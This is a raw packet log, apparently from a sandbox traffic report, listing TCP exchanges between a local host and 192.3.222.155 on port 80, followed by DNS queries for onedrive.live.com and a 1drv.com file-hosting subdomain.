Oct 13, 2021 17:05:26.822885990 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822911024 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822942972 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822946072 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822977066 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822987080 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823004961 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823029995 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823057890 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823065042 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823090076 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823103905 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823122025 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823162079 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823179960 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823201895 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823230982 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823232889 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823262930 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823283911 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823304892 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823324919 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823350906 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823385954 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823385954 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823393106 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823398113 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823411942 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823417902 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823426008 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823458910 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823467016 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823471069 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823486090 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823492050 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823508978 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823539972 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823545933 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823549032 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823585033 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823612928 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823621035 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823641062 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823659897 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823673010 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823700905 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823709011 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823739052 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823770046 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823774099 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823798895 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823813915 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823829889 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823854923 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823859930 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823892117 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823920965 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823926926 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823942900 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.823965073 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.823978901 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.824064016 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.981628895 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.981678009 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.981718063 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.981745005 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.981767893 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.981822968 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.992222071 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.992316961 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.992383003 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.992418051 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.992438078 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.995357037 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997189045 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997289896 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997389078 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997443914 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997459888 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997510910 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997520924 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997567892 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997574091 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997617006 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997629881 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997673988 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997684956 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997730970 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997742891 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997787952 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997802019 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997847080 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997858047 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997901917 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997920990 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.997972012 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.997973919 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998018026 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998028994 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998085022 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998086929 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998133898 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998145103 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998189926 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998202085 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998246908 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998255014 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998302937 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998306036 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998351097 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998372078 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998418093 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998426914 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998471975 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998480082 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998524904 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998534918 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998579979 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998594046 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998637915 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998650074 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998694897 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.998697996 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998754978 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998823881 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.998883009 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999033928 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999099970 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999191999 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999248981 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999301910 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999300957 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999341011 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999341965 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999353886 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999362946 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999371052 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999380112 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999380112 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999386072 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999394894 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999402046 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999409914 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999418020 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999444962 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999456882 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999475002 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999545097 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999547005 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999602079 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999609947 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999653101 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999660969 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999692917 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999705076 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999706030 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999764919 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999768019 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999823093 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999828100 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999882936 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999886036 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.999939919 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.999943972 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000000000 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000005007 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000060081 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000062943 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000118017 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000123978 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000180960 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000185013 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000242949 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000253916 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000314951 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000318050 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000370979 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000371933 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000427961 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000431061 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000485897 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000498056 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000554085 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000556946 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000613928 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000617981 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000675917 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000679970 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000739098 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.000751972 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.000812054 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.124804974 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.125142097 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.155205011 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.155231953 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.155695915 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.155741930 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.165721893 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.165749073 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.165889978 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.165921926 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.168806076 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.168827057 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.168956995 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.168998957 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.174055099 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174082994 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174103022 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174122095 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174163103 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174204111 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174230099 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174252987 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174273014 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174293041 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174314022 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174331903 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174355984 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174376011 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174400091 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174422026 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174442053 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174460888 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174480915 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174499989 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174520016 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174540043 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174618959 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174640894 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174660921 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174680948 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174705982 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174736977 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174752951 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174772978 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174793005 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174818039 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174840927 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174860001 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174880028 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174901009 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174920082 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174945116 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174963951 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.174988031 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175010920 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175030947 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175050974 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175071001 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175090075 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175108910 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175144911 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175164938 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175185919 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175205946 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175225019 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175245047 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175263882 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.175287962 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.178313971 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178350925 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178358078 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178363085 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178368092 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178371906 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178375006 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178378105 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178380966 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178384066 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178388119 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178390980 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178394079 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178396940 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178400993 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178406000 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178409100 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178411961 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178415060 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178419113 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178421021 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178425074 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178427935 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178431988 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178435087 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178438902 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178443909 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178447008 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178450108 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178452969 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178457022 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178459883 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178463936 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178467035 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178471088 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178474903 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178478956 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178483963 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178487062 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178491116 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178494930 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178497076 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178502083 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178503990 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178508043 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178512096 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178515911 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178519964 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178523064 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178527117 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178529978 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178534031 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178535938 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.178540945 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:27.352001905 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.352052927 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:27.352283001 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:28.552711964 CEST	49167	80	192.168.2.22	192.3.222.155

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 17:06:38.585946083 CEST	52167	53	192.168.2.22	8.8.8.8
Oct 13, 2021 17:06:40.084522963 CEST	50591	53	192.168.2.22	8.8.8.8
Oct 13, 2021 17:07:18.294235945 CEST	57805	53	192.168.2.22	8.8.8.8
Oct 13, 2021 17:07:18.772310019 CEST	59030	53	192.168.2.22	8.8.8.8
Oct 13, 2021 17:07:18.845947981 CEST	59185	53	192.168.2.22	8.8.8.8
Oct 13, 2021 17:07:19.136692047 CEST	55616	53	192.168.2.22	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 17:06:38.585946083 CEST	192.168.2.22	8.8.8.8	0x9487	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Oct 13, 2021 17:06:40.084522963 CEST	192.168.2.22	8.8.8.8	0x4a4c	Standard query (0)	hqpyda.bl.files.1drv.com	A (IP address)	IN (0x0001)
Oct 13, 2021 17:07:18.294235945 CEST	192.168.2.22	8.8.8.8	0x1a95	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Oct 13, 2021 17:07:18.772310019 CEST	192.168.2.22	8.8.8.8	0x391f	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
